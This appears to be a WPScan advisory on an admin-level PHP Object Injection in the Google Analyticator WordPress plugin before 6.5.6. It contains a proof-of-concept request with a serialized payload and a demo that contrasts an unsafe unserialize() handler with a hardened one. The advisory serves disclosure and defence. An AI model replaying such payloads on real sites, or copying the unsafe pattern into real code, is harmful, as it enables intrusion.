wpvulndb
WPVDB-ID: DF1C36BB-9861-4272-89C9-AE76E62F687C
Author: Nguyễn Phạm Việt Nam
History: Dec 27, 2022 - 12:00 a.m.

Google Analyticator < 6.5.6 - Admin+ PHP Object Injection

Source: wpscan.com
Tags: google analyticator, php object injection, settings, gadget chain, admin, security flaw, vulnerability

EPSS: 0.001 (Low), percentile 36.6%

The plugin passes the ga_domain_names value submitted from its settings page to unserialize() as-is. A high-privilege user such as an administrator can therefore supply a serialized object and perform PHP Object Injection, which becomes code execution or another impact when a suitable gadget chain (a class with a reachable __wakeup/__destruct or similar magic method) is present on the site.

PoC

To simulate a gadget chain, put the following code in the plugin:

    class Evil {
        public function __wakeup(): void {
            die("Arbitrary deserialization");
        }
    }

Then, as Admin, go to the plugin settings page (/wp-admin/admin.php?page=google-analyticator), save the settings and intercept the request that is made. Keep all captured fields as they are, set ga_domain_names to O:4:"Evil":0:{} and replay it:

    POST /wp-admin/admin.php?page=google-analyticator HTTP/1.1

    _wpnonce=&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dgoogle-analyticator&ga_status=disabled&ga_uid=UA-XXXXXXXX-X&ga_analytic_snippet=disabled&key_ga_show_ad=1&info_update=Save+Changes&ga_annon=0&ga_admin_status=enabled&ga_admin_role%5B%5D=administrator&ga_admin_disable=remove&ga_admin_disable_DimentionIndex=&ga_enable_remarketing=0&key_ga_track_login=0&ga_outbound=enabled&ga_event=enabled&ga_enhanced_link_attr=disabled&ga_downloads=&ga_outbound_prefix=outgoing&ga_downloads_prefix=download&ga_adsense=&ga_extra=&ga_extra_after=&ga_widgets=enabled&ga_dashboard_role%5B%5D=administrator&ga_domain_names=O:4:"Evil":0:{}

The response will contain the "Arbitrary deserialization" output, showing that the serialized object was instantiated and its __wakeup() method ran.
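The sink behind this PoC, reduced to a stand-alone script that can be run outside WordPress. This is an added example, not the plugin's code or the advisory's own PoC: the Evil class mirrors the simulated gadget above (echo instead of die so the script keeps going), while the two handler functions and the sample settings values are hypothetical. It shows the unsafe unserialize() call next to a hardened version that refuses object instantiation and then validates the shape of what it gets back.

```php
<?php
// Added example (not the Google Analyticator plugin's code).
// Function names and sample values below are hypothetical.

// Simulated gadget, as in the PoC. In a real attack this is any class already
// loaded by WordPress, a theme or another plugin whose __wakeup()/__destruct()
// does something useful for the attacker (file write, template include, ...).
class Evil {
    public function __wakeup(): void {
        echo "Arbitrary deserialization\n";
    }
}

// Vulnerable pattern: the posted setting goes straight into unserialize(),
// so O:4:"Evil":0:{} instantiates Evil and its __wakeup() runs.
function save_domain_names_unsafe(string $posted) {
    return unserialize($posted);
}

// Hardened: allowed_classes=false turns any serialized object into
// __PHP_Incomplete_Class without calling its magic methods. The result is then
// checked against the shape the setting is supposed to have (a list of
// hostnames); anything else is discarded instead of being stored.
function save_domain_names_safe(string $posted): array {
    $value = @unserialize($posted, ['allowed_classes' => false]);
    if (!is_array($value)) {
        return [];
    }
    $clean = [];
    foreach ($value as $domain) {
        if (is_string($domain) && preg_match('/^[a-z0-9.-]+$/i', $domain)) {
            $clean[] = strtolower($domain);
        }
    }
    return $clean;
}

// Constructed inputs: a legitimate value and the PoC payload.
$legit   = serialize(['example.com', 'Example.org']);
$payload = 'O:4:"Evil":0:{}';

echo "unsafe / legitimate: "; var_dump(save_domain_names_unsafe($legit));
echo "unsafe / payload:    "; var_dump(save_domain_names_unsafe($payload)); // prints "Arbitrary deserialization", returns object(Evil)
echo "safe / legitimate:   "; var_dump(save_domain_names_safe($legit));    // array('example.com', 'example.org')
echo "safe / payload:      "; var_dump(save_domain_names_safe($payload));  // __wakeup() never runs; returns array()
```

Run it with php on the command line; the "Arbitrary deserialization" line appears only for the unsafe handler. Note that allowed_classes alone only stops gadget execution; the shape check is what keeps a non-object but still malformed value from ending up in the database, and storing the setting as a plain array or JSON instead of a PHP-serialized string removes the unserialize() call altogether.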

Affected versions (CPE): google-analyticator < 6.5.6

